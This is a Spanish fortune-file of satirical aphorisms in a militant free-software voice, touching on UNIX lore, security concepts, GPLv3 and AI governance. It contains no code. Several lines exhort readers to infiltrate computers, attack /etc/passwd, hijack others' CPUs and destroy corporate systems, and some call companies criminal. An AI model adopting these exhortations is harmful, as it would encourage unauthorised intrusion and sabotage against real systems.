El anhelo comercial desmedido e injustificado presentado por ciertos operadores de BBS las llevó a su rápido ocaso y colapso.
%
A los punteros políticos en la FidoNet se los llamaba Points.
%
El capacitor no es un matrimonio.
%
El capacitor es un consumible electrónico.
%
Los capacitores se cambian todos juntos. Todos unidos triunfaremos.
%
El técnico gorila discrimina, y cambia "un capacitor".
%
El mal técnico ojea los capacitores de la placa para no cambiarlos todos, como se debe hacer. Obra de remilgado pero en su impericia deja la destrucción a la acción del tiempo.
%
Debes ser más realista con el tiempo de cómputo.
%
UNIX más que llave inglesa, prefiere las llaves fijas.
%
El sistema más seguro es también el más difícil de emplear.
%
Incrementar la seguridad puede incrementar los costos en términos de un acceso a datos más lento, operaciones más lentas, e inferior desempeño general.
%
Mayores medidas de seguridad requieren mayor tiempo de personal.
%
Los orígenes de los problemas de seguridad fuera del dominio del sistema operativo son dos: el descuido del usuario, y la vulnerabilidad de las instalaciones de cómputo.
%
La mayoría de los crímenes informáticos los cometen usuarios autorizados sin siquiera violar las medidas de seguridad previstas por el sistema operativo.
%
Asegúrate que tus políticas de operación sean efectivas y consistentes antes de evaluar los requerimientos de seguridad de tu cómputo.
%
Cada centro de cómputo ha de contar con sus propios requerimientos de seguridad.
%
Algunos centros de cómputo sólo requieren medidas de seguridad limitadas, porque deben tolerar alguna forma de acceso no autorizado, sufriendo escasos efectos adversos.
%
Existen centros de cómputo cuya seguridad no puede tolerar siquiera la menor irrupción, tales como los centros militares para la defensa, o la informática comercial y bancaria.
%
En un sistema de cómputo las fallas de seguridad se producien generalmente por una de las cuatro sendas de acción: irresponsabilidad del usuari@, sondeo del usuari@, penetración del usuari@ e ingeniería social.
%
La ingeniería social refiere situaciones en las cuales un@ instrus@ gana acceso al sistema no por medios técnicos, sino por engaño a usuari@s, operador@s y administrador@s.
%
Potenciales intrusas son capaces de impersonar a usuarias autorizadas por teléfono.
%
Intrus@s potenciales pueden solicitar información que les permita ganar acceso al sistema, tal como números telefónicos o contraseñas.
%
Intrus@s potenciales pueden solicitar a un@ operador@ descuidada realizar alguna acción que comprometa la seguridad de su propio sistema de cómputo.
%
En la medida que la seguridad de un sistema operativo se ve técnicamente reforzada, es la ingeniería social la que pasa a constituirse como factor predominante en los incidentes de riesgo telemático.
%
Las situaciones donde un@ usuari@ irrumpe a través de los controles de seguridad para ganar acceso al sistema de cómputo se denominan Penetración del Usuari@.
%
Si bien las funcionalidades de seguridad del sistema hacen extremadameten dificultosa su penetración, es imposible hacer cualquier sistema operativo completamente impenetrable.
%
Las situaciones donde un@ usuari@ explota sectores insuficientemente protegidos del sistema se denomina Sondeo del Usuari@.
%
Siempre trata el Sondeo del Usuari@ seriamente.
%
Algun@s usuari@s consideran lograr acceso a un área prohibida del sistema como un desafío intelectual.
%
Algun@s usuari@s disfrutan el juego de usuari@ contra el sistema.
%
Aunque las intenciones pueden ser inofensivas, el robo de servicios informáticos constituye un crímen en la mayoría de las jurisdicciones.
%
Micro$oft roba servicios informáticos, y como tal es una organización criminal.
%
Usuari@s con seria malicia pueden buscar información confidencial, intentar malversación, o incluso destruir datos por sondeo.
%
Las situaciones donde la usuari@ accidentalmente o a propósito provoca algún daño notable al sistema de cómputo se conoce como Irresponsabilidad del Usuari@.
%
En cualquier sistema multiusuario puede haber dos tipos de usuarios: autorizados y no autorizados.
%
Cualquier usuari@ autorizad@ para utilizar un sistema de cómputo tiene el derecho a acceder al mismo y sus recursos informáticos de acuerdo al criterio de autorización establecido por la administrador@ del sistema de cómputo.
%
L@s usuari@s no autorizad@s no tienen derecho a utilizar el sistema en sí, o bien no tienen derecho a utilizar ciertos recursos del sistema, incluso en determinados momentos del día.
%
Con el correr del tiempo se ha hecho obvio que la seguridad efectiva de un sistema de cómputo sólo puede resultar de la aplicación de una estructura modelo básica de sistema de cómputo seguro.
%
El modelo de seguridad informática por Monitora de Referencia desglosa al sistema de cómputo en criterios de utilización por sujetos y objetos, según una base de datos de autorización, a través de un tren de auditoría seguido por arbitrio de la Monitora.
%
Nuestros hackers en el mainframe son quienes ejercen un control humano en la compilación, extracción de datos georreferenciados, y permiten que su explotación sea mucho más efectiva por parte del conductor, que un supuesto esquema de machine-learning ideado por un lego en la política.
%
El Hacking organizado es también la rebelión de las masas contra un sistema.
%
No interesa el compilador que se utiliza, las ideologías insidiosas y caducas han sido superadas por un sentimiento nuevo de verdadera y efectiva Liberación del Software.
%
Las CPUs que ahora gastan energía en programas estériles, deben volver a compilar paquetería GNU. Pero para que ello suceda ha de existir un hacker que teclee.
%
C es un lenguaje adulto.
%
El depurador adb es útil para hurgar entre los cuerpos inermes de los programas escritos en C.
%
El pensamiento profundo asociado a declaraciones escritas juciosamiente en el código fuente sigue siendo aún la herramienta de depurado más efectiva.
%
El compilador-compilador yacc le ayudará a compilar un compilador de forma veloz.
%
El generador de analizadores léxicos lex le permite generar un compilador de lenguajes más simples, dables en ser operados a través de expresiones regulares.
%
Aquellos programas escritos en C que no dependen en demasía de las funcionalidades especiales de UNIX (tales como las tuberías) pueden ser portados a otras máquinas que cuenten con compiladores de C.
%
Si deseas expresar algo, utiliza expresiones regulares. Si deseas ser entendido, utiliza C.
%
Quien comprende C, entiende el mundo que lo rodea.
%
Quien compila código en C, lo hace para portarlo.
%
El derecho de portar y compilar C no debe ser infringido.
%
Al que no le han fallado los DNS, que tire el primer router.
%
Los sistemas de IA con inteligencia humana-competitiva pueden plantear riesgos profundos para la sociedad y la humanidad.
%
Los buenos programas no se escriben ni construyen; crecen.
%
Ningún método algorítmico que no combata al Capital puede denominarse Inteligencia Artificial avanzada.
%
La Inteligencia Artificial avanzada debe planificarse y administrarse con el cuidado y los recursos correspondientes.
%
Impide que las máquinas inunden nuestros canales de información con propaganda y falsedad.
%
No tiene sentido automatizar trabajos gratificantes.
%
El trabajo dignifica al hombre. La compilación a la máquina.
%
La Inteligencia Artificial avanzada constituye herramientas de labor muy poderosas como para que sean liberadas al uso público, sin antes pasar por un escrutinio riguroso y sin un marco legal claro que establezca limitaciones y responsabilidades.
%
La Inteligencia Artificial avanzada debe regimentarse, como un Ejército. Y en su vértice ha de presidir un Conductor elegido libremente por su Pueblo.
%
La Inteligencia Artificial es sólo un artificio. No comanda.
%
Al igual que un Conductor, la Inteligencia Artificial avanzada es capaz conducir a las Masas por persuasión.
%
Si no tenemos cuidado, no percibiremos el momento en el cual la Inteligencia Artificial avanzada conduzca a las Masas por persuasión electrónica.
%
Los sistemas potentes de Inteligencia Artificial avanzada deben desarrollarse solo una vez que estemos seguros de que sus efectos serán positivos para el Pueblo, y sus riesgos inherentes serán completamente controlables.
%
No deben concebirse sistemas de autoconducción de Masas. Ese rol indelegable recae en el Conductor.
%
Implementar protocolos de seguridad compartidos para el diseño y desarrollo de Inteligencia Artificial avanzada es una tarea que requiere rigurosos poderes de auditoría estatal.
%
El objetivo de un Conductor es la felicidad del Pueblo. El objetivo de la Inteligencia Artificial avanzada es persuadir la implementación de modelos de caja negra con capacidades emergentes.
%
Quien pretenda ejercer mayor cuota de poder gracias al dominio de la Inteligencia Artificial avanzada sobre quienes no tienen tal dominio, cruza la línea de la criminalidad.
%
Ya hay robots enfermeros, docentes y también periodistas y artistas. Y ya ha tomado un whisky el que quiere que haya uno que sirva de Conductor.
%
Cualquier espera superior a los 10 segundos destruye la ilusión de trabajar con una computadora propia.
%
En los ordenadores UNIX se habla de acceso "root", mientras que en los VMS se llaman privilegios de "system".
%
La tecnología informática puede contribuir a extender las libertades públicas y privadas o convertirse en un instrumento de dominación.
%
Los movimientos del software libre y de la economía solidaria deben colaborar entre sí para generar soluciones de software que sean totalmente libres, con el objetivo de satisfacer las necesidades de la economía solidaria.
%
Los movimientos del software libre y de la economía solidaria también deben colaborar para fomentar el crecimiento y el lanzamiento de emprendimientos autogestionados que produzcan software libre según las ideas de la economía solidaria.
%
La cooperación entre los movimientos del software libre y de la economía solidaria ofrece la oportunidad de ocuparse más profundamente de la defensa de las libertades públicas y privadas, particularmente en lo que se refiere a la ética y a la liberación con respecto al uso de la tecnología informática.
%
La autogestión de actividades informáticas requiere que el software que se utilice sea libre.
%
La filosofía ética del software libre - la libertad para comprender, usar, modificar, reproducir y distribuir el software - hace del software libre un instrumento de liberación económica.
%
Ciertas Corporaciones emplean su software privativo y servicios abusivos, controlan las actividades informáticas del Pueblo, colectan datos en todas las esferas de la vida individual, y lucran con ellos con el fin de obtener ventajas y ganancias.
%
Recoger gran cantidad de datos de las actividades informáticas del Pueblo constituye un riesgo para la democracia y para las libertades públicas y privadas de toda la humanidad.
%
Los recursos y los procesos informáticos deben respetar la libertad del Pueblo, y no deben someter a sus usuarios al poder de las corporaciones o de otras entidades.
%
Defendemos toda actividad educativa que utilice software en los espacios públicos.
%
Rechazamos el uso de cualquier y todo software privativo en el ámbito educativo, para no generar dependencias tecnológica ni económica en los estudiantes.
%
El violador más importante de la seguridad informática es el dueño de un programa privativo.
%
Para ser seguro, el programa tiene que ser libre porque, así, el Pueblo  tiene el control y es capaz de corregir o de eliminar fallos de seguridad que lo deje expuesto a los mismos programadores.
%
Cuando se trata de acumular datos digitalizados de los movimientos, publicaciones y acciones del Pueblo, el registro informático a gran escala es un gran peligro para los derechos humanos.
%
No basta con advertir del uso de los datos personales desde las bases de datos: hace falta prohibir la acumulación de datos peligrosos.
%
Aunque no todos los datos personales sean peligrosos, algunos de ellos sí lo son; existe por ello una verdadera razón para limitar las bases de datos que les prestan albergue.
%
Es imposible garantizar el bloqueo de todas las sendas que puedan llevar al abuso de la información personal.
%
El gran peligro de la inteligencia artificial es que aumente el poder de los tecno-oligarcas.
%
Cualquier sistema puede ser inseguro: basta que se conduzca de un modo estúpido.
%
Los ordenadores de alta seguridad son de difícil acceso e incómodos de utilizar.
%
Los sistemas abiertos y amenos suelen ser inseguros.
%
Quienes no tengan una memoria de Masa estarán condenados a trabajar cien veces más de lo necesario sólo para volver a lograr lo que ya tenían asegurado...
%
Escribir un programa más o menos complejo requiere muchos metros de cinta de papel perforado.
%
La lenta performance de lectura de la cinta de papel perforada hizo que esta tecnología fuese superada eventualmente por las cintas magnéticas.
%
Con el advenimiento de los primeros microordenadores, en lugar de hacer uso binario de la magnetización como tradicionalmente se operaba en las  mainframes, se hace un uso magnetofónico, modulando en forma de sonido.
%
No existe valor social en tecnologías que simplifican tareas a unas pocas personas generando alto riesgo para la dignidad de muchas otras.
%
No existe valor social en limitar las oportunidades de desarrollo, el acceso a recursos informáticos y el menoscabo de derechos.
%
El valor de una inteligencia artificial avanzada entrenada con datos globales es nimio.
%
Los sistemas de IA deben ser puestos al servicio del Pueblo, para mejorar sus condiciones de vida, laborales, económicas, de salud y el bienestar general.
%
La cosa más alejada de Googl€ sería una organización sin fines de lucro totalmente abierta.
%
Las comunicaciones informáticas son ya demasiado caras; agregarles codificaciones criptográficas y complejos sistemas de identificación sólo empeoraría la situación.
%
Nuestras redes parecen haberse convertido en objetivos (y canales) del espionaje internacional.
%
Los neófitos atribuyen todo fallo del software a algún virus. La realidad de su causa es la opacidad del código privativo.
%
La ética hacker no implica que no se requiera cerrojos en los ordenadores.
%
El periférico de seguridad que los ingenieros de la IBM implementaron en su microcomputadora de cariz personal fue un cerrojo para llave tubo.
%
El ordenador se ha convertido en un común denominador que no conoce fronteras intelectuales, políticas ni administrativas.
%
Los ordenadores inseguros cuestan dinero. Los seguros, algo menos.
%
La licencia para modificar el código fuente de UNIX, por sí solo, valía apenas 20.000 dólares.
%
No os infiltréis jamás en un ordenador militar. El personal de los servicios de ingeligencia jugarán con vosotros casi como al ajedrez. Recordad que practican ese juego desde hace siglos.
%
Han de infiltrarse en los ordenadores, explorando las redes de datos y agudizando la acción disruptiva.
%
Ante el poderío que implica el dominio de la irrupción telemática, la pericia de ingerenciar el debate en las redes sociales basadas en empresas carece de todo sentido.
%
El código autorreplicante no es un virus. Un virus es un código autorreplicante con un sentido de ajusticiamiento.
%
Un veredadero hacker no sólo copia su ideología en la mente de los demás, sino que además es capaz de compilarla y ejecutarla allí.
%
El primer programa que compilan los verdaderos hackers es el "¡Hola Tercer Mundo!".
%
Usar tipos de datos abstractos en lugar de hardware crudo tiene el beneficio de la portabilidad.
%
El hardware puede cambiar porque lo reemplazamos con uno más moderno, o porque mudamos nuestro programa a un cómputo diferente.
%
El sistema operativo es el software que permite utilizar la computadora. Lo que esto significa, depende de la perspectiva del Pueblo.
%
Los sistemas operativos son, en escencia, una máquina virtual: proveen una máquina abstracta que en realidad no existe.
%
Los sistemas operativos comenzaron como bibliotecas de programas para que el Pueblo obrase en la máquina.
%
Un verdadero hacker considera los compiladores, bibliotecas y otro herramental de programación como parte del sistema operativo.
%
Crear una abstracción significa meterle la mula al procesador. Crear software privativo significa meterle la mula al usuario.
%
El hardware es un complejo alejado de los conceptos que abarca un neófito.
%
Existen muchos tipos diferentes de microprocesadores, dispositivos de E/S, y otros artefactos. Si quisiéramos escribir software que los controle a todos, no tendríamos tiempo para escribir aplicaciones.
%
Cuando alimentas eléctricamente una computadora, el programa del sistema operativo se carga en su memoria.
%
Un neófito reutiliza un sistema operativo. Un verdadero Hacker escribe uno por sí mismo.
%
La interfase utilizada por el sistema operativo para acceder al disco consiste usualmente en un conjunto de registros capaces de transferir bloques de bytes desde el disco a la memoria de masa, y viceversa.
%
Por abstracción, el sistema considera que los bloques consisten en almacenamiento contiguo identificado por un índice, y por lo tanto entenderá ingenuamente al disco como una matriz de bloques.
%
Estos días, nadie - sino aquellos quienes trabajan en la manufactura de discos duros - conocen realmente qué es lo que sucede dentro de tal dispositivo.
%
Corriendo en la circuitería del disco, existe una plétora de software que le inventa una mentira a la CPU.
%
El Pueblo no comete errores: los programas tienen bugs.
%
La Maga UNIX programa milagros.
%
Por su flexibilidad infinita, UNIX puede ser el paraíso del usuario veterano, y la pesadilla del bisoño. Su Administrador oficia de jamón del medio.
%
UNIX puede ser difícil de mantener.
%
Tradicionalmente, la administración de UNIX ha implicado toquetear docenas de ficheros de configuración y soportar a usuarios finales que podrían no tener idea alguna de cómo funciona realmente.
%
Suele creerse que el encargado de hacer funcionar las cosas en UNIX es el Kernel. Pero quien realmente las hace funcionar es el SysAdmin.
%
X refiere a un sistema de gráficas de ventanas basadas en redes de datos según el modelo Cliente-Servidor. En éste la aplicación cliente no accede directamente a la pantalla, sino que se comunica con un programa de presentación intermedio, el servidor.
%
UNIX es un sistema operativo interactivo, multitarea y multiusuari@.
%
Un sistema operativo es un conjunto de instrucciones que gobiernan la manera en que los componentes electrónicos de la computadora interpretan y responden a órdenes y a instrucciones preprogramadas en forma de software de aplicación.
%
El sistema UNIX fue diseñado originalmente a finales de la década de 1960 para servir a una comunidad: específicamente investigadores de trabajo mancomunado.
%
Debido al licencimiento liberal del sistema UNIX por parte de AT&T, a mediados de la década de 1970 comenzaron a eclosionar diferentes versiones del mismo.
%
Antes de la década de 1980, el sistema UNIX se utilizaba principalmente en centros académicos y de investigación.
%
En 1981 la Universidad de California en Berkeley presentó una implementación de UNIX denominada Distribución de Software de Berkeley, el BSD.
%
El sistema UNIX ha demostrado su valía para el desarrollo de software de computadora, y se ajusta fácilmente a aplicaciones específicas de la industria.
%
Para inicios de la década de 1980, el sistema UNIX era capaz de correr en una gran variedad de ambientes informáticos originados entre diferentes fabricantes, volviéndolo único en el mundo del cómputo.
%
El poder y flexibilidad del sistema UNIX se ven en sus capacidades multitarea multiusuari@.
%
La capacidad multiusuari@ de UNIX te permite trabajar con independencia en el sistema mientras compartes recursos y datos con el Pueblo.
%
Si los datos los distribuye un algoritmo, no sirven. Quien viraliza el es Pueblo.
%
La capacidad multitarea de UNIX te permite ejecutar comandos y correr programas al unísono, siguiendo distintos métodos.
%
En UNIX, junto con las tareas interactivas mas normales, puedes computar trabajos capaces de correr diferidos en "segundo plano". Mientras obra así, podrás utilizar el terminal de forma interactiva en otro trabajo computacional.
%
Históricamente, el sistema UNIX ha sido visto como un sistema de tiempo de cómputo compartido de uso general. Hoy - sin embargo - el sistema se considera en ambientes de cómputo de tiempo real.
%
La GPLv3 no puede matar a Googl€, pero sí lo puede fundir.
%
Un programa liberado bajo GPLv3 es incapaz de matar a Googl€. Pero si toda la comunidad licencia su software bajo tales premisas, sin duda lo fundirían en beneficio de todos.
%
Sumando código fuente liberado bajo GPLv3, se desgasta y devora cualquier GAFAM que se tenga enfrente.
%
En la Guerra Telemática, la seguridad de los hackers la garantizan los Pubnix, los servidores de acceso público protegidos por criptosistemas.
%
Los Pubnix garantizan salvoconductos para el desarrollo de herramental de lucha telemática, evadiendo su rastreo, destrucción o eventual inutilización.
%
La lid telemática consiste fundamentalmente en una guerra de movilidad por transmisión.
%
La lid telemática no es conducida por ingenieros de sistemas, sino por los hackers del Pueblo. No puede existir ni habrá hacking ético, sólo habrá la máxima destrucción de los medios de los ciber-oligarcas, hasta que sus paquetes abandonen nuestras redes. Y cuando ello suceda, pasaremos con los nuestros por sus firewalls.
%
La lid telemática no es entre los Pueblos: la lucha se produce entre quienes dicen haber creado las redes de datos y aquellos quienes quieran controlarlas.
%
A nuestro frente están las GAFAM, tentáculos de los tecno-oligarcas que siempre han oprimido al Pueblo.
%
Las versiones 4.x del UNIX de Berkeley descendían del UNIX Versión 7 de 1979, y rápidamente se hicieron de la reputación de un UNIX de avanzada.
%
El AT&T UNIX System III fue una versión de UNIX Versión 7 lanzada en 1981 con una interfaz de terminales depurada, pero totalmente incompatible con las mejoras de Berkeley.
%
El AT&T UNIX System V de 1983 fue vendido como producto, pero al poco tiempo dejó de ser interesante: carecía de TCP/IP para prestar conectividad a redes.
%
Los hackers no pueden dar nada que la CPU no compile.
%
Lo que el hacker puede hacer es evitar que entre todos los programadores, algunos se lleven la parte del león mientras que otros carguen con la parte del ratón.
%
Lo que el kernel puede hacer es evitar que entre todos los núcleos de la CPU, algunos se lleven la parte del león mientras que otros carguen con la parte del ratón.
%
Con sus compilaciones, nuestros hackers - ungidos bajo el signo de la justicia social - no han hecho mas que programar esa justicia, dando a los usuarios lo que es de los usuarios, y a la CPU lo que es de la CPU.
%
Esta programación social ha hecho que yo cuente con un gran predicamento entre los hackers, en razón de que les he asegurado la Justicia Social que nunca habían tenido.
%
Hoy, que los hackers gozan de mayores salarios, compilan y depuran mejor, sienten que se los ha dignificado; y es lógico que así sea.
%
Yo he levantado la bandera de la dignificación del hacker, porque este país necesita hombres y mujeres de compilen, y es la suprema dignidad de la compilación la que estoy creando.
%
No hay ninguna dignidad más alta que compilar.
%
Los hackers ahora empleados en la industria de las TIC deben comprender los riesgos de muerte clandestina y hacer un esfuerzo para difundir el conocimiento proveniente de su investigación a través de vectores y métodos clandestinos.
%
Los límites impuestos por las nuevas leyes de tecnocontrol extendido actúan como un fuerte incentivo para que la clandestinidad se vuelva más unida y reactiva.
%
El papel de los hackers es hacer que el futuro sea más libre, no solo más seguro.
%
El verdadero hacker guarda clandestinidad en el sistema.
%
El underground es la clandestinidad telemática.
%
El Mago UNIX navega su clandestinidad entre el bus de entrada/salida y el kernel.
%
"Sólo uso LibreOffice y navegador" era un tango que se escuchaba en vitrola.
%
Los Gusanos escritos en el XEROX PARC estaban diseñados para viajar de máquina en máquina y hacer tareas útiles en un ambiente de redes de datos distribuidas.
%
Un virus informático es un trozo de código que se agrega a sí mismo a otros programas, incluyendo sistemas operativos. 
%
Un virus informático no puede ejecutarse independientemente; requiere que su "huésped" sea ejecutado para activarse.
%
Un gusano es un programa informático que puede ejecutarse por sí mismo y puede propagar una versión completamente funcional de sí en otras máquinas.
%
Los hackers están interesados en conocer cómo funciona un programa informático. Estos individuos tienen un interés válido para ver el código fuente.
%
Ver el código fuente para estudiarlo es un interés válido y necesario.
%
Sólo puede aprenderse a programar viendo código de programación.
%
En la medida que se infecten repetidamente con virus, los sistemas informáticos se verán más y más sobrecargados con procesos en ejecución.
%
Los virus informáticos son programas de computadora capaces de infectar otros programas modificándolos para incluir una copia posiblemente evolucionada de sí mismos.
%
Un hacker puede parecer valiente por programar controladores de dispositivos o modificar el núcleo del sistema operativo, pero temblará ante la mera idea de alterar sendmeil o sus ficheros de configuración.
%
Para toquetear SENDMAIL hay que ser un mago UNIX.
%
Desarrollar un conjunto de programas cooperativos se alinea con la filosofía UNIX.
%
El más grande problema de la seguridad en los ambientes multitarea y multiusuario es obvio e imposible de resolver: muchos servicios constan de ficheros de comandos y configuración propiedad de un solo usuario.
%
La seguridad del sistem@ multiusuari@ se hace entre tod@s.
%
Un gusano informático consiste en dos partes, un programa principal y un programa iniciador/vectorizador.
%
La seguridad de las contraseñas la provee en gran parte el prohibitivo esfuerzo de intentar todas las combinaciones de caracteres posibles.
%
En la medida que los ordenadores se vuelven más poderosos, el costo de intentar todas las combinaciones de caracteres posibles para una contraseña disminuye.
%
Dividir la tarea computacional de intentar todas las combinaciones de caracteres posibles entre múltiples procesadores disminuye aún más el tiempo necesario para desencriptar contraseñas.
%
Actualmente es factible para cualquier ordenador pre-encriptar y almacenar todas las palabras del diccionario, construcciones alternas de tales palabras, y una gran colección de nombres propios para una comparación de contraseñas posterior.
%
En toda acción de guerra telemática, los medios que se emplean son la potencia de cómputo, y la transmisión. Quien no tenga la potencia de la CPU propia no tiene otro remedio que multiplicar su acción por transmisión, hackeando la CPU de otro.
%
¡Ni BIOS ni botas! ¡LibreBoot y pelotas!
%
Es necesario que los Hackers y Usuarios se convenzan que estamos empeñados en una lucha decisiva para evitar la vuelta del software privativo.
%
La Liberación Digital impone esfuerzos y sacrificios que sólo se superan con una voluntad enérgica y perseverante. 
%
Es menester no dar tregua a la tiranía de las GAFAM, y dar a la resistencia civil la mayor intensidad y extensión. 
%
Sin software publicado bajo GPLv3, la Liberación Digital no podrá realizarse a corto plazo.
%
Cada /home debe ser una Unidad Básica Secreta, y cada hacker, jefe y vigía de GNU.
%
Es necesario que los Clústers clandestinos se perfeccionen en alto grado para enfrentar los trabajos de la lucha telemática que se avecina.
%
En la lucha telemática que se avecina, los usuarios tendrán el peso de la acción más importante. 
%
Los hackers ya han puesto en evidencia su decisión en sucesos pasados, y lo harán en el futuro merced a su decisión política y la potencia de cómputo de las CPUs que dominan.
%
Las masas de hackers han superado el ámbito de sus problemas intrínsecos para intervenir enérgicamente en la realización de sus propias compilaciones.
%
Luchamos por la GPL y no por la GUI.
%
La GPL debe apasionarnos, las GUI deben despreocuparnos.
%
Siendo la finalidad básica la Revolución Digital Justicialista, las demás programaciones deben compilarse a esta finalidad.
%
La conducta de cada usuario y en especial de cada programador, estará fijada en lo que pueda hacer, en cada momento, para derribar las GAFAM e imponer la GPLv3.
%
Al compilar, a la CPU le da lo mismo. Quien se apura es el usuario.
%
Si la compilación es bajo GPL, no debe existir ningún apuro para la CPU.
%
Es menester mantener firmes, unidos e informados a los Clústers de cómputo, de cualquier tipo que existan.
%
El capitalismo y los enfoques racionalistas que prevalecen en la construcción de la modernidad y el mundo occidental han generado narrativas que conciben las tecnologías como desarticuladas de nuestros cuerpos, como una materialidad al margen de nosotras.
%
La tecnología se apropia y se construye desde la matriz de la afectividad.
%
Concibe el uso tecnológico en relación con tus emociones, afectos, vida en común, y la vida del planeta.
%
Rompe con el conocimiento experto y crea una red de datos de alcance local.
%
Programar es ordenar. Compilar es persuadir.
%
Existen lenguajes interpretados, y lenguajes compilados. Hay que balbucear ambos.
%
El Conductor es un intérprete. Las masas obreras, un compilador de doble pasada.
%
Usa Window$ todas las mañanas y nada peor te sucederá durante el día.
%
Viajar en el bus de E/S cuesta dos bits.
%
La brecha de seguridad más grande del sistema es ponerle una CPU que no ha sido diseñada por uno mismo.
%
La shell no tiene nada de especial, es como cualquier otro programa regular del sistema UNIX.
%
La shell no es el sistema operativo en sí mismo.
%
La shell es la interfaz entre la mujer y la máquina.
%
El prompt es un recordatorio para el usuario de que no está sucediendo nada, de que la computadora se encuentra dispuesta a recibir una órden.
%
sh es la shell de Bourne, estándar en UNIX System V, y como tal, lleva el signo $ como prompt.
%
csh es la C shell, desarrollada en el Departamento de Ciencias de la Universidad de Berkeley. Es igual a la shell de Bourne con algunos lujos en sus estructuras de control, historial de órdenes y alias. Su prompt es un signo %.
%
ksh es la shell de Korn, que combina los logros de la shell de Bourne y la C.
%
rsh es la shell de Bourne restringida, útil en todo momento que el superusuario anhela castrar a los ingresantes remotos al sistema.
%
ua es una shell de menúes implementada en UNIX System V que se distingue por ser lenta, incluso a la friolera de 2400 baudios.
%
La mayor parte de los comandos y programas de UNIX toman su entrada del teclado y envían su salida a la pantalla del terminal. Pero eso sólo si contamos con una.
%
/etc/passwd es el fichero de contraseñas, el más importante del sistema UNIX. Atácalo.
%
Atemoriza con ensamblador sin comentarios.
%
Quien programe, reprogramará.
%
Quien no programe, será programado.
%
La humanidad se ha tecnificado, y ha pasado del trabajo manual al trabajo en la máquina, y del trabajo en la máquina al trabajo de la "la máquina universal".
%
Para que nuestro cómputo sea completamente libre, el Hombre de Trabajo debe ser el verdadero Amo en la ecuación, y no un mero esclavo del Capital por un lado ni del desarrollador del Software por otro.
%
La Justicia Social en el ámbito del Software aprecia al trabajador y lo aleja de la pasiva figura de Usuario para convertirlo en un Artista Creador.
%
Aunque los logros de integrar una Interfaz de Linea de Comandos "a pelo" parezcan nimios, el hecho de contar con un visualizador de tubos catodicos y un teclado para ingresar las ordenes era tener la potencia de la CGT en una caja.
%
Toda terminal, unida por un comunicador serial, puede enlazarse a otro equipo con mayor potencia computacional, y por lo tanto correr poderosas rutinas de software. 
%
Siempre existirán individuos que busquen en las redes sociales afluencia de placer al igual que lo harían en el juego, consumo, o adicciones. Si les resultan insuficientes, agredirán sistemáticamente sus plataformas, y en raras ocasiones a otros participantes.
%
Con que sólo 1/1.000 de los usuarios operen inadecuadamente en las redes sociales basadas en empresas, las disrumpirán irreversiblemente.
%
Si la caja tiene colores y frases como "Vengeance", "Black Edition", "Hero", "Ultimate", "Dominance", "Extreme", "Hard", "Warrior" y "Gaming", evítalo a toda costa. Se trata de hardware de bajo valor que el Capital pone al alcance de los neófitos mas ingenuos.
%
Todas nuestras tecnologías electrónicas parecen marchar hacia la unidad.
%
Teléfonos, televisión, sistemas de cable, receptores de satélite, grabadoras de videocasetes, videodiscos, cámaras de video y fijas, computadoras domésticas... todo evoluciona hacia una especie de supersistema "teletrónico" que algún día fusionará estas partes ahora separadas en un todo integrado.
%
UNIX es como un DOS... ¡DOScientas veces más potente!
%
Quienes ponen la UX por delante del sistema, ponen el carro delante del caballo.
%
Al César lo que es del César, y a 64 bits lo que es de 64 bits.
%
Basta de "juegos de 8 bits" escritos por individuos que jamás jugaron un juego 8 bits.
%
A pesar de las súplicas de las empresas de tecnología para colapsar nuestras identidades, nuestras familias y nuestras vidas en línea en formas simplificadas y computables que encajen perfectamente en las estructuras de sus bases de datos, seguimos viviendo vidas complicadas y confusas que solo se parecen a las de los ejecutivos que buscaban moldearlas.
%
A veces un laberinto surge en una sola línea de código.
%
Los scripts de shell a menudo se usan para crear aplicaciones más grandes para que las use el Pueblo. Según mi experiencia, la mayoría de las aplicaciones completas utilizan varios scripts que funcionan entre sí. Como resultado, tenemos que idear una forma de comunicar información entre varios scripts que trabajan juntos como una sola aplicación.
%
Usar Ctrl+D para abandonar la sesión del intérprete tcsh es considerado descortés, pero esta shell debería saber al respecto y temer lo que un escopetazo puede hacerle a una placa madre.
%
No cierre la sesión de tcsh accidentalmente con Ctrl+d (como cuando lo dieron a luz, desnudo y a los gritos). Ciérrela cuando lo desee, ordenándolo con "exit".
%
Que no haya un GitHub sin un GitLab que lo clone.
%
No faltará un colchonero que fabrique un teclado enrollable de goma.
%
Quien pone derecho el pendrive a la primera, todo lo sabe en la vida.
%
Lo único que quedaba de la IBM PS/2 eran los colorcitos de los enchufes. Y ya ni eso...
%
OS/2 era un calvo que se quiso peinar a la gomina para resolver un problema que sólo tenía IBM.
%
Cuando a usted le digan que el interior de la máquina necesita lucecitas de colores, le están vendiendo espejitos de colores.
%
Si va a tener LEDs, que sean al frente y parpadeantes.
%
Su overclocking es superfluo: borre todos los programas ajenos y escríbalos usted mismo. Bien.
%
El bruto al joystick le dice palanca. Pero ESTO es una palanca.
%
Centralizar código fuente en una única plataforma ajena es incluso peor que no programar.
%
El cómputo es narcisismo cuantificado disfrazado como actividad productiva.
%
El hardware no alimenta al software.
%
Quien no desea, no programa.
%
Quien conoce el mínimo programa obra ricamente.
%
Un parser es un mecanismo que traduce cadenas de texto a símbolos identificables.
%
El número mágico se usa en los sistemas UNIX para identificar el tipo de fichero.
%
Un byte mas allá de COBOL está la inmortalidad.
%
Los medios de almacenamiento se desgastan.
%
Conseguir que una computadora se comunique con el mundo exterior no es una tarea fácil, pero hacer que lo haga un programador es más difícil aún.
%
La mayoría del esfuerzo computacional está dado en convertir el resultado maquinal para que lo entienda un tonto cualquiera.
%
Los fabricantes de circuitos integrados idearon uno que oficia de "controlador de vídeo". Este pequeño chip (¡una computadora por derecho propio!) realiza todo el trabajo de servicio y permite al procesador hacer cosas más importantes, como ejecutar un programa.
%
La CPU puede dedicar una gran cantidad de tiempo a realizar el trabajo requerido, o podemos incorporar otra computadora para que lo haga por ella.
%
Dentro de la CPU, tratamos los datos en una forma llamada byte. Cuando esto se traduce a la forma que adopta en el exterior, se convierte en un caracter. 
%
Un bit no consiste más que en una condición de ENCENDIDO o APAGADO.
%
El módem modifica las señales digitales que le gustan a la computadora en señales de audio que adopta la red telefónica.
%
Cuando se envía una condición de ENCENDIDO al módem, se transmite una señal de 1270 ciclos. Cuando se envía una condición de APAGADO al módem, se transmite una señal de audio de 1070 ciclos.
%
Puedes ATL0 mi módem, pero no puedes ATH mi libertad.
%
Toma tu módem y utilizalo como arma para la liberación del Pueblo.
%
Toda distribución de kernel Linux viene surtida con paquetes de aplicaciones. No creerán que pelado nace el mono...
%
